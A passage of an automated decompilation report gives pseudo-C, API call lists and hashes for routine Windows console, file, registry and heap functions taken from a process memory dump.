                                                      						_t39 = 0 | _t30 != 0x00000000;
                                                      						goto L5;
                                                      					}
                                                      					_t55 = _t53 - 1;
                                                      					if(_t55 == 0) {
                                                      						_t39 = 0 | _t30 < 0x00000000;
                                                      						goto L5;
                                                      					}
                                                      					_t56 = _t55 - 1;
                                                      					if(_t56 == 0) {
                                                      						_t39 = 0 | _t30 <= 0x00000000;
                                                      						goto L5;
                                                      					}
                                                      					_t57 = _t56 - 1;
                                                      					if(_t57 != 0) {
                                                      						if(_t57 != 1) {
                                                      							_t31 = 0;
                                                      							goto L6;
                                                      						}
                                                      						_t39 = 0 | _t30 >= 0x00000000;
                                                      						goto L5;
                                                      					}
                                                      					_t39 = 0 | _t30 > 0x00000000;
                                                      					goto L5;
                                                      				} else {
                                                      					_t39 = 0 | _t30 == 0x00000000;
                                                      					L5:
                                                      					_t31 = _t39;
                                                      					L6:
                                                      					return _t31;
                                                      				}
                                                      			}
















                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: wcstol$lstrcmp
                                                      • String ID:
                                                      • API String ID: 3515581199-0
                                                      • Opcode ID: ba017630e09af1372f036a10e62fb38356ada7dcf9e12b104bb66fabaf05f355
                                                      • Instruction ID: 927a3e99f277b9404c76353a9a50ea9e4345ce2e08c7f174c9fa6152947b3fe8
                                                      • Opcode Fuzzy Hash: ba017630e09af1372f036a10e62fb38356ada7dcf9e12b104bb66fabaf05f355
                                                      • Instruction Fuzzy Hash: 4E21D87722EE11BBE7B55675CC5176A7EACEF01265F428429E503C28A3E760DD04C790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 21%
                                                      			E4A735932(short* _a4, char _a8) {
                                                      				signed int _v8;
                                                      				void* __ecx;
                                                      				void* _t12;
                                                      				signed int _t13;
                                                      				void* _t14;
                                                      				long _t17;
                                                      				void* _t28;
                                                      				long _t38;
                                                      
                                                      				_push(_t28);
                                                      				_v8 = _v8 & 0x00000000;
                                                      				_t38 = _a8;
                                                      				if(_t38 <= 0) {
                                                      					L4:
                                                      					_t13 = _v8;
                                                      					L5:
                                                      					return _t13;
                                                      				}
                                                      				_t14 = E4A734490(_t12, 1);
                                                      				_t15 =  &_a8;
                                                      				if(_t14 != 0) {
                                                      					__imp___get_osfhandle(1, _a4, _t38, _t15, 0);
                                                      					_pop(_t28);
                                                      					if(WriteConsoleW(_t15, ??, ??, ??, ??) != 0) {
                                                      						L3:
                                                      						if(_a8 != _t38) {
                                                      							L9:
                                                      							_t17 = GetLastError();
                                                      							_v8 = _t17;
                                                      							if(_t17 == 0) {
                                                      								_v8 = 0x70;
                                                      							}
                                                      							if(E4A733B03(_t17, _t28, 1) == 0) {
                                                      								if(E4A736BEA(_t18, 1) == 0) {
                                                      									E4A74056B(_v8);
                                                      								} else {
                                                      									_push(0);
                                                      									_push(0x2364);
                                                      									E4A736D44(_t28);
                                                      								}
                                                      								_t13 = 1;
                                                      								goto L5;
                                                      							}
                                                      							_push(0);
                                                      							_push(0x1d);
                                                      							E4A736D44(_t28);
                                                      						}
                                                      						goto L4;
                                                      					}
                                                      					GetLastError();
                                                      					goto L9;
                                                      				}
                                                      				_t38 = _t38 + _t38;
                                                      				if(E4A73453E( &_a8, 1, _a4, _t38,  &_a8) == 0) {
                                                      					goto L9;
                                                      				}
                                                      				goto L3;
                                                      			}












                                                      APIs
                                                        • Part of subcall function 4A734490: _get_osfhandle.MSVCRT ref: 4A73449A
                                                        • Part of subcall function 4A734490: GetFileType.KERNEL32(00000000), ref: 4A7344A9
                                                      • _get_osfhandle.MSVCRT ref: 4A736DE7
                                                      • WriteConsoleW.KERNEL32 ref: 4A736DEF
                                                      • GetLastError.KERNEL32(?,4A744FE5,%s %s ,?,?), ref: 4A749E38
                                                      • GetLastError.KERNEL32(?,4A744FE5,%s %s ,?,?), ref: 4A749E3A
                                                        • Part of subcall function 4A73453E: _get_osfhandle.MSVCRT ref: 4A734550
                                                        • Part of subcall function 4A73453E: WideCharToMultiByte.KERNEL32(00000000,?,000000FF,4A756640,00002000,00000000,00000000,00000001,?,?,4A73596D,00000001,?,?,?,00000001), ref: 4A73459B
                                                        • Part of subcall function 4A73453E: WriteFile.KERNEL32(?,4A756640,-00000001,4A744FE5,00000000), ref: 4A7345AE
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: _get_osfhandle$ErrorFileLastWrite$ByteCharConsoleMultiTypeWide
                                                      • String ID:
                                                      • API String ID: 3517615490-0
                                                      • Opcode ID: 3eadf4a734b660c0baffe900753b0dc352f7fdf8ef6c32ad957d28bac19b01dd
                                                      • Instruction ID: 1ebdd3bdec50a0f3b735d2cbe088b6c375a137ab473639b6516dcb143d105d36
                                                      • Opcode Fuzzy Hash: 3eadf4a734b660c0baffe900753b0dc352f7fdf8ef6c32ad957d28bac19b01dd
                                                      • Instruction Fuzzy Hash: 3E11213364D215BBEB319AA1CC49FDF3F6CDB41AA1F124016F805DA082DB34DA09D724
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 78%
                                                      			E4A74D003(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                      				short* _t21;
                                                      				long _t24;
                                                      				char* _t35;
                                                      				void* _t36;
                                                      				long _t40;
                                                      				void* _t43;
                                                      
                                                      				_push(0x14);
                                                      				_push(0x4a74d0d8);
                                                      				E4A73264A(__ebx, __edi, __esi);
                                                      				 *(_t43 - 0x20) = 0;
                                                      				 *(_t43 - 0x24) = 0;
                                                      				_t36 =  *(_t43 + 8);
                                                      				 *(_t43 - 0x1c) = _t36;
                                                      				 *((intOrPtr*)(_t43 - 4)) = 0;
                                                      				_t21 =  *(_t43 + 0xc);
                                                      				if(_t21 == 0 ||  *_t21 == 0) {
                                                      					L4:
                                                      					_t24 = RegQueryValueExW( *(_t43 - 0x1c), 0, 0, _t43 + 0xc, 0, _t43 - 0x24);
                                                      					if(_t24 != 2) {
                                                      						if(_t24 != 0) {
                                                      							goto L3;
                                                      						} else {
                                                      							_t35 = E4A731896( *(_t43 - 0x24));
                                                      							 *(_t43 - 0x20) = _t35;
                                                      							if(_t35 == 0) {
                                                      								_push(8);
                                                      								goto L11;
                                                      							} else {
                                                      								_t40 = RegQueryValueExW( *(_t43 - 0x1c), 0, 0, _t43 + 0xc, _t35, _t43 - 0x24);
                                                      								if(_t40 != 0) {
                                                      									E4A73142E(_t35);
                                                      									 *(_t43 - 0x20) = 0;
                                                      									_push(_t40);
                                                      									goto L11;
                                                      								}
                                                      							}
                                                      						}
                                                      					} else {
                                                      						 *(_t43 - 0x20) = E4A7319D6(E4A733AFC);
                                                      					}
                                                      				} else {
                                                      					_t24 = RegOpenKeyExW(_t36, _t21, 0, 1, _t43 - 0x1c);
                                                      					if(_t24 == 0) {
                                                      						goto L4;
                                                      					} else {
                                                      						L3:
                                                      						_push(_t24);
                                                      						L11:
                                                      						SetLastError();
                                                      					}
                                                      				}
                                                      				 *((intOrPtr*)(_t43 - 4)) = 0xfffffffe;
                                                      				E4A74D0C7();
                                                      				return E4A7313B6( *(_t43 - 0x20));
                                                      			}










                                                      APIs
                                                      • RegOpenKeyExW.KERNEL32 ref: 4A74D035
                                                      • RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,?), ref: 4A74D056
                                                      • RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,?), ref: 4A74D08F
                                                      • SetLastError.KERNEL32(00000000), ref: 4A74D0A5
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: QueryValue$ErrorLastOpen
                                                      • String ID:
                                                      • API String ID: 4270309053-0
                                                      • Opcode ID: 8a8dbba58b2bbf89a8139bc48a89533def0be84943d05d3f199dcbefb2bce091
                                                      • Instruction ID: 1cb01813d6fa2ff26d04115930c3d0ba62f4db5b59d5fbcce27fb010c6a7d349
                                                      • Opcode Fuzzy Hash: 8a8dbba58b2bbf89a8139bc48a89533def0be84943d05d3f199dcbefb2bce091
                                                      • Instruction Fuzzy Hash: C42109B1906129BBCB309B94CC488EE7FBDAB49B50F118456F445A7162D774894ACBB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 39%
                                                      			E4A741BE3(intOrPtr _a4, char _a8, FILETIME* _a12, intOrPtr _a16) {
                                                      				char _v8;
                                                      				void* __ecx;
                                                      				void* _t14;
                                                      				void* _t15;
                                                      				intOrPtr _t16;
                                                      				void* _t17;
                                                      				intOrPtr _t19;
                                                      				void* _t24;
                                                      				char _t27;
                                                      				FILETIME* _t30;
                                                      				intOrPtr* _t33;
                                                      
                                                      				_t27 = _a8;
                                                      				_t13 =  *((intOrPtr*)(_t27 + 0x20));
                                                      				_v8 = 0x1a;
                                                      				if( *((intOrPtr*)(_t27 + 0x20)) == 0) {
                                                      					_t13 = _t27;
                                                      				}
                                                      				_t14 = E4A741C6C(_t13);
                                                      				_t30 = _a12;
                                                      				_t33 = __imp___get_osfhandle;
                                                      				if(_t14 != 0) {
                                                      					_t15 = E4A733B03(_t14, _t27, _t30);
                                                      					if(_t15 == 0) {
                                                      						_t24 =  *_t33( &_v8, 1,  &_a8, _t15);
                                                      						_t27 = _t30;
                                                      						WriteFile(_t24, ??, ??, ??, ??);
                                                      					}
                                                      				}
                                                      				_t16 = _a4;
                                                      				if(_t16 != 0 && ( *(_t16 + 0x1c) & 0x00000080) == 0 && E4A733B03(_t16, _t27, _t30) == 0) {
                                                      					_t19 =  *0x4a754168; // 0x0
                                                      					if(_t19 != 3 && _a16 != 0 && _t19 != 2) {
                                                      						SetFileTime( *_t33(_a16), _t30, 0, 0);
                                                      					}
                                                      				}
                                                      				_t17 = E4A733AB3(_t30);
                                                      				 *0x4a754164 =  *0x4a754164 + 1;
                                                      				return _t17;
                                                      			}















                                                      APIs
                                                      • _get_osfhandle.MSVCRT ref: 4A741C4B
                                                      • SetFileTime.KERNEL32(00000000,?,4A7494D2,?,?,000000FF,00000000), ref: 4A741C4F
                                                      • _get_osfhandle.MSVCRT ref: 4A74873A
                                                      • WriteFile.KERNEL32(00000000,?,4A7494D2,?,?), ref: 4A74873E
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: File_get_osfhandle$TimeWrite
                                                      • String ID:
                                                      • API String ID: 4019809305-0
                                                      • Opcode ID: 9049c7071ffda9ee65a127335c6a058e0ce4fbc14d1564740539e38ccc539ae9
                                                      • Instruction ID: ca2366afa92894a900adb4b259ccd68feefc81ff61c0ebecc58f38304586fed2
                                                      • Opcode Fuzzy Hash: 9049c7071ffda9ee65a127335c6a058e0ce4fbc14d1564740539e38ccc539ae9
                                                      • Instruction Fuzzy Hash: 3E11C17224A229BBEB71AE50CD49FBB3F7CEB82690F020015F902D7181D734D949DB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 42%
                                                      			E4A74F619(intOrPtr _a4, intOrPtr _a8, char _a12, WCHAR* _a16, intOrPtr _a20) {
                                                      				void* _t10;
                                                      				int _t11;
                                                      				void* _t19;
                                                      				void* _t20;
                                                      				char _t22;
                                                      				intOrPtr _t25;
                                                      				intOrPtr _t27;
                                                      				intOrPtr _t28;
                                                      
                                                      				_t22 = _a12;
                                                      				_t10 =  &_a12;
                                                      				_t19 = 0;
                                                      				__imp___get_osfhandle(_a4, _a8, _t22, _t10, 0);
                                                      				_pop(_t20);
                                                      				_t11 = WriteFile(_t10, ??, ??, ??, ??);
                                                      				if(_t11 == 0 || _t22 != _a12) {
                                                      					L3:
                                                      					 *0x4a754128 = GetLastError();
                                                      					E4A733AB3(_a20);
                                                      					if(E4A733B03(E4A733AB3(_a4), _t20, _a4) == 0) {
                                                      						DeleteFileW(_a16);
                                                      					} else {
                                                      						_t19 = 0x1d;
                                                      					}
                                                      					 *0x4a754120 = 0;
                                                      					_t27 =  *0x4a754128; // 0x0
                                                      					if(_t27 == 0) {
                                                      						 *0x4a754128 = 0x70;
                                                      					}
                                                      					_t28 =  *0x4a7541b4; // 0x0
                                                      					if(_t28 == 0) {
                                                      						if(_t19 == 0) {
                                                      							E4A74056B( *0x4a754128);
                                                      						}
                                                      					} else {
                                                      						_t19 = 0;
                                                      					}
                                                      					return L4A74F2D7(_t20, _t19, 1);
                                                      				} else {
                                                      					_t25 =  *0x4a7541b4; // 0x0
                                                      					if(_t25 == 0) {
                                                      						return _t11;
                                                      					}
                                                      					goto L3;
                                                      				}
                                                      			}

                                                      APIs
                                                      • _get_osfhandle.MSVCRT ref: 4A74F634
                                                      • WriteFile.KERNEL32(00000000,4A749439,000000FF,?,?), ref: 4A74F63C
                                                      • GetLastError.KERNEL32 ref: 4A74F653
                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 4A74F682
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                      • String ID:
                                                      • API String ID: 2448200120-0
                                                      • Opcode ID: a37990c612c04970aae64e45feb12e76c077b133269e9afb5c3998d13e2e185d
                                                      • Instruction ID: 5b5120d205eaf6289337692f0a58ffe16a18673ae36f97c0e26b08f308f20276
                                                      • Opcode Fuzzy Hash: a37990c612c04970aae64e45feb12e76c077b133269e9afb5c3998d13e2e185d
                                                      • Instruction Fuzzy Hash: 6711E7B2589215EFEF715F61DC598DA3F7DEB85762B02002AF904D58A0C7319C58CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 60%
                                                      			E4A73839B(void* __eax, long __ebx, void* __edx, LONG* __edi, long __esi) {
                                                      				long _t13;
                                                      				intOrPtr _t14;
                                                      				intOrPtr _t15;
                                                      				void* _t16;
                                                      				int _t17;
                                                      				int _t18;
                                                      				intOrPtr* _t20;
                                                      				intOrPtr _t23;
                                                      				void* _t24;
                                                      				long _t25;
                                                      				void* _t26;
                                                      				intOrPtr _t28;
                                                      				LONG* _t35;
                                                      				long _t36;
                                                      				intOrPtr _t38;
                                                      				void* _t40;
                                                      				void* _t52;
                                                      				void* _t53;
                                                      
                                                      				_t36 = __esi;
                                                      				_t35 = __edi;
                                                      				_t25 = __ebx;
                                                      				[far dword [edx]();
                                                      				while(1) {
                                                      					__eflags = _t13 - _t36;
                                                      					if(__eflags == 0) {
                                                      						break;
                                                      					}
                                                      					Sleep(0x3e8);
                                                      					_t13 = InterlockedCompareExchange(_t35, _t36, _t25);
                                                      					if(_t13 != _t25) {
                                                      						continue;
                                                      					} else {
                                                      						_t38 = 1;
                                                      					}
                                                      					L3:
                                                      					_t14 =  *0x4a754200; // 0x0
                                                      					if(_t14 == _t38) {
                                                      						L4A752309();
                                                      						_t26 = 0x1f;
                                                      						goto L7;
                                                      					} else {
                                                      						_t23 =  *0x4a754200; // 0x0
                                                      						if(_t23 != 0) {
                                                      							 *0x4a77090c = _t38;
                                                      							goto L7;
                                                      						} else {
                                                      							 *0x4a754200 = _t38;
                                                      							_t24 = E4A738271(0x4a738378, 0x4a738384);
                                                      							_pop(_t26);
                                                      							if(_t24 != 0) {
                                                      								 *((intOrPtr*)(_t40 - 4)) = 0xfffffffe;
                                                      								_t18 = 0xff;
                                                      								goto L26;
                                                      							} else {
                                                      								L7:
                                                      								_t15 =  *0x4a754200; // 0x0
                                                      								if(_t15 == _t38) {
                                                      									_push(0x4a738374);
                                                      									L4A737C76();
                                                      									_t26 = 0x4a73836c;
                                                      									 *0x4a754200 = 2;
                                                      								}
                                                      								if( *((intOrPtr*)(_t40 - 0x1c)) == _t25) {
                                                      									InterlockedExchange(_t35, _t25);
                                                      								}
                                                      								_t52 =  *0x4a770688 - _t25; // 0x0
                                                      								if(_t52 != 0) {
                                                      									_t16 = E4A75227C(_t25, _t35, _t38, __eflags);
                                                      									_t26 = 0x4a770688;
                                                      									__eflags = _t16;
                                                      									if(_t16 != 0) {
                                                      										 *0x4a770688(_t25, 2, _t25);
                                                      									}
                                                      								}
                                                      								_push( *0x4a75423c);
                                                      								_push( *0x4a754240);
                                                      								_push( *0x4a754238);
                                                      								_t17 = L4A737308(_t26, _t35, _t38);
                                                      								 *0x4a754274 = _t17;
                                                      								_t53 =  *0x4a754138 - _t25; // 0x0
                                                      								if(_t53 != 0) {
                                                      									__eflags =  *0x4a77090c - _t25; // 0x0
                                                      									if(__eflags == 0) {
                                                      										__imp___cexit();
                                                      									}
                                                      									 *((intOrPtr*)(_t40 - 4)) = 0xfffffffe;
                                                      									_t18 =  *0x4a754274; // 0x0
                                                      									L26:
                                                      									return E4A7313B6(_t18);
                                                      								} else {
                                                      									exit(_t17);
                                                      									_t20 =  *((intOrPtr*)(_t40 - 0x14));
                                                      									_t28 =  *((intOrPtr*)( *_t20));
                                                      									 *((intOrPtr*)(_t40 - 0x20)) = _t28;
                                                      									_push(_t20);
                                                      									_push(_t28);
                                                      									L4A7521EE();
                                                      									return _t20;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				_t38 = 1;
                                                      				 *((intOrPtr*)(_t40 - 0x1c)) = 1;
                                                      				goto L3;
                                                      			}

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: ExchangeInterlocked$CompareFilterSleepXcpt_inittermexit
                                                      • String ID:
                                                      • API String ID: 1487059562-0
                                                      • Opcode ID: 7bde2b564fc007bf7d7ed0549145ab357095894e71a3c0662a95b69c185f90a5
                                                      • Instruction ID: 183492b4a745661015d2ee3f2a6c822bcbd4a0f71911746f4f0308987157d9b4
                                                      • Opcode Fuzzy Hash: 7bde2b564fc007bf7d7ed0549145ab357095894e71a3c0662a95b69c185f90a5
                                                      • Instruction Fuzzy Hash: 0C11E2F584DA319FEBB18F60D88AA1D3FBDFB42711712005EE501DAA42E7394848CB4A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 57%
                                                      			E4A732536(void* _a4, intOrPtr _a8) {
                                                      				void* _t18;
                                                      				void* _t20;
                                                      				void* _t22;
                                                      				void* _t25;
                                                      				long _t26;
                                                      
                                                      				_t11 = _a8;
                                                      				_t22 = _a4 + 0xfffffff8;
                                                      				_t3 = _t11 + 8; // 0x8
                                                      				_t26 = _t3;
                                                      				_a4 = _t22;
                                                      				if(_t26 < _a8) {
                                                      					L12:
                                                      					_push(0);
                                                      					_push(8);
                                                      					E4A736D44(_t22);
                                                      					return 0;
                                                      				}
                                                      				_t20 = HeapReAlloc(GetProcessHeap(), 0, _t22, _t26);
                                                      				if(_t20 == 0) {
                                                      					goto L12;
                                                      				}
                                                      				 *_t20 = _t26;
                                                      				HeapSize(GetProcessHeap(), 0, _t20);
                                                      				if(_t20 != _a4) {
                                                      					_t18 =  *0x4a754100; // 0x0
                                                      					if(_t18 != _a4) {
                                                      						while(_t18 != 0) {
                                                      							_t25 =  *(_t18 + 4);
                                                      							if(_t25 == _a4) {
                                                      								 *(_t18 + 4) = _t20;
                                                      								goto L3;
                                                      							}
                                                      							_t18 = _t25;
                                                      						}
                                                      						goto L3;
                                                      					}
                                                      					 *0x4a754100 = _t20;
                                                      				}
                                                      				L3:
                                                      				_t6 = _t20 + 8; // 0x8
                                                      				return _t6;
                                                      			}

                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,-000000F8,00000008,00000000,00000000,00000000,?,4A732520,00000000,00000000,00000000,?,4A732456,?,00000000,00000002), ref: 4A73255F
                                                      • HeapReAlloc.KERNEL32(00000000,?,4A732520,00000000,00000000,00000000,?,4A732456,?,00000000,00000002,00000000,00000000,00000000), ref: 4A732562
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,4A732520,00000000,00000000,00000000,?,4A732456,?,00000000,00000002,00000000,00000000,00000000), ref: 4A732577
                                                      • HeapSize.KERNEL32(00000000,?,4A732520,00000000,00000000,00000000,?,4A732456,?,00000000,00000002,00000000,00000000,00000000), ref: 4A73257A
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Heap$Process$AllocSize
                                                      • String ID:
                                                      • API String ID: 2549470565-0
                                                      • Opcode ID: 2bd57b821c6358531ceef513767f34d1e8d7a188c12ea115d0cb2a70b9010f69
                                                      • Instruction ID: dd5ece28e1539f82f26777bc45a742914d341c7d2ad72046b4d163059a933375
                                                      • Opcode Fuzzy Hash: 2bd57b821c6358531ceef513767f34d1e8d7a188c12ea115d0cb2a70b9010f69
                                                      • Instruction Fuzzy Hash: 6B11C671319606EFD7748F94D899E5A3FE9EB403A1F128115F6088F241DB70EE44C7A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 22%
                                                      			E4A733B03(void* __eax, void* __ecx, intOrPtr _a4) {
                                                      				long _v8;
                                                      				intOrPtr _t13;
                                                      				void* _t17;
                                                      				void* _t18;
                                                      				void* _t24;
                                                      				void* _t25;
                                                      
                                                      				__imp___get_osfhandle(_a4, _t24, __ecx);
                                                      				_t25 = __eax;
                                                      				if((GetFileType(__eax) & 0xffff7fff) == 2) {
                                                      					_t13 = _a4;
                                                      					if(_t13 == 0) {
                                                      						_push(0xfffffff6);
                                                      						goto L6;
                                                      					} else {
                                                      						_t18 = _t13 - 1;
                                                      						if(_t18 != 0) {
                                                      							if(_t18 == 1) {
                                                      								_push(0xfffffff4);
                                                      								goto L6;
                                                      							}
                                                      						} else {
                                                      							_push(0xfffffff5);
                                                      							L6:
                                                      							_t25 = GetStdHandle();
                                                      						}
                                                      					}
                                                      					if(GetConsoleMode(_t25,  &_v8) == 0) {
                                                      						 *0x4a754154 =  *0x4a754154 & 0x00000000;
                                                      					} else {
                                                      						if((_v8 & 0x00000007) == 0) {
                                                      							if((_v8 & 0x00000003) != 0) {
                                                      								 *0x4a754154 = 2;
                                                      							}
                                                      						} else {
                                                      							 *0x4a754154 = 1;
                                                      						}
                                                      					}
                                                      					_t17 = 1;
                                                      				} else {
                                                      					 *0x4a754154 =  *0x4a754154 & 0x00000000;
                                                      					_t17 = 0;
                                                      				}
                                                      				return _t17;
                                                      			}










                                                      APIs
                                                      • _get_osfhandle.MSVCRT ref: 4A733B0D
                                                      • GetFileType.KERNEL32(00000000), ref: 4A733B17
                                                      • GetStdHandle.KERNEL32(000000F4,?,4A749E50,00000001,?,4A744FE5,%s %s ,?,?), ref: 4A734A50
                                                      • GetConsoleMode.KERNEL32 ref: 4A734A5D
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: ConsoleFileHandleModeType_get_osfhandle
                                                      • String ID:
                                                      • API String ID: 746850120-0
                                                      • Opcode ID: b959d647bf60f77be3fa306bdd53277e2f7ebfec1241be571d925c88a528d47c
                                                      • Instruction ID: 29e262f28bb0663e89cdc184ec3b7e07d8a2e4d5e98a60d2964be709f8b6db0c
                                                      • Opcode Fuzzy Hash: b959d647bf60f77be3fa306bdd53277e2f7ebfec1241be571d925c88a528d47c
                                                      • Instruction Fuzzy Hash: 0501E5B249D494ABD73587D8C9097EA3FA9E702276F030255E425C29C2D7344A48C758
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E4A740AF9(struct _COORD _a4, short _a6) {
                                                      				long _v8;
                                                      				signed short _v30;
                                                      				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
                                                      				void* _t20;
                                                      				int _t27;
                                                      				void* _t30;
                                                      
                                                      				_t27 = _a4;
                                                      				if(((_t27 >> 0x00000004 ^ _t27) & 0x0000000f) == 0) {
                                                      					return 1;
                                                      				}
                                                      				_t30 = GetStdHandle(0xfffffff5);
                                                      				if(GetConsoleScreenBufferInfo(_t30,  &_v32) == 0) {
                                                      					_t20 = 1;
                                                      				} else {
                                                      					_a6 = 0;
                                                      					_a4.X = 0;
                                                      					FillConsoleOutputAttribute(_t30, _t27, _v32.dwSize * _v30, _a4,  &_v8);
                                                      					SetConsoleTextAttribute(_t30, _t27);
                                                      					_t20 = 0;
                                                      				}
                                                      				return _t20;
                                                      			}










                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F5,?,00000104,?,?,?,4A740995,00000000,00000001), ref: 4A740B17
                                                      • GetConsoleScreenBufferInfo.KERNEL32 ref: 4A740B24
                                                      • FillConsoleOutputAttribute.KERNEL32(00000000,00000001,?,00000001,?), ref: 4A740B4D
                                                      • SetConsoleTextAttribute.KERNEL32(00000000,00000001), ref: 4A740B55
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                      • String ID:
                                                      • API String ID: 1033415088-0
                                                      • Opcode ID: e1d2d998db6b1a7501d9a3b266edb8a180636652ca9d868c547e84b81a34e0d8
                                                      • Instruction ID: 9ffd0b3c17f888c74194ddb65d39ae9a448871ba0c9c154eaff8f8024ac11f20
                                                      • Opcode Fuzzy Hash: e1d2d998db6b1a7501d9a3b266edb8a180636652ca9d868c547e84b81a34e0d8
                                                      • Instruction Fuzzy Hash: C001D673614109BF9B20AFE48C859FF7BBCEF0A695B018121FA15C6041E634CE06C3B8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 19%
                                                      			E4A734490(void* __eax, intOrPtr _a4) {
                                                      				long _v8;
                                                      				void* _t5;
                                                      				intOrPtr _t9;
                                                      				void* _t14;
                                                      				void* _t16;
                                                      				void* _t18;
                                                      				void* _t19;
                                                      
                                                      				__imp___get_osfhandle(_a4, _t18, _t16);
                                                      				_t19 = __eax;
                                                      				if(__eax == 0xffffffff || (GetFileType(__eax) & 0xffff7fff) != 2) {
                                                      					L2:
                                                      					_t5 = 0;
                                                      				} else {
                                                      					_t9 = _a4;
                                                      					if(_t9 == 0) {
                                                      						_push(0xfffffff6);
                                                      						goto L7;
                                                      					} else {
                                                      						_t14 = _t9 - 1;
                                                      						if(_t14 != 0) {
                                                      							if(_t14 == 1) {
                                                      								_push(0xfffffff4);
                                                      								goto L7;
                                                      							}
                                                      						} else {
                                                      							_push(0xfffffff5);
                                                      							L7:
                                                      							_t19 = GetStdHandle();
                                                      						}
                                                      					}
                                                      					if(GetConsoleMode(_t19,  &_v8) == 0) {
                                                      						goto L2;
                                                      					} else {
                                                      						_t5 = 1;
                                                      					}
                                                      				}
                                                      				return _t5;
                                                      			}











                                                      APIs
                                                      • _get_osfhandle.MSVCRT ref: 4A73449A
                                                      • GetFileType.KERNEL32(00000000), ref: 4A7344A9
                                                      • GetStdHandle.KERNEL32(000000F5,?,4A7397DD,0000233A,00000000,74EC14B9,00000000,?,?,?,?,?,4A736D61,00000000,00000002,0000233A), ref: 4A7344D5
                                                      • GetConsoleMode.KERNEL32 ref: 4A7344E2
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: ConsoleFileHandleModeType_get_osfhandle
                                                      • String ID:
                                                      • API String ID: 746850120-0
                                                      • Opcode ID: e4f546bb267c6c2342152bbb4f27479316b770b590f3c11c6633fa063f18d068
                                                      • Instruction ID: b45634ea68a9555c9192a66b54319d22eaf56242d3c8e03979963e01187133f2
                                                      • Opcode Fuzzy Hash: e4f546bb267c6c2342152bbb4f27479316b770b590f3c11c6633fa063f18d068
                                                      • Instruction Fuzzy Hash: 0BF0C87315DC107A9FB44AF4CC0999A3FACD6021B6B134331E873D24D1EA24C914C795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 57%
                                                      			E4A74FCA6(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                      				void* _t2;
                                                      
                                                      				_t2 = E4A7437A5(__ecx, __edi, __esi);
                                                      				__imp__longjmp(0x4a754b40, 1);
                                                      				asm("int3");
                                                      				if( *0x4a7540b4 == 0) {
                                                      					L7:
                                                      					__eax = E4A7437A5(__ecx, __edi, __esi);
                                                      					__imp__longjmp(0x4a754b40, 1);
                                                      					asm("int3");
                                                      					 *0x4a770924 =  *0x4a770924 & 0x00000000;
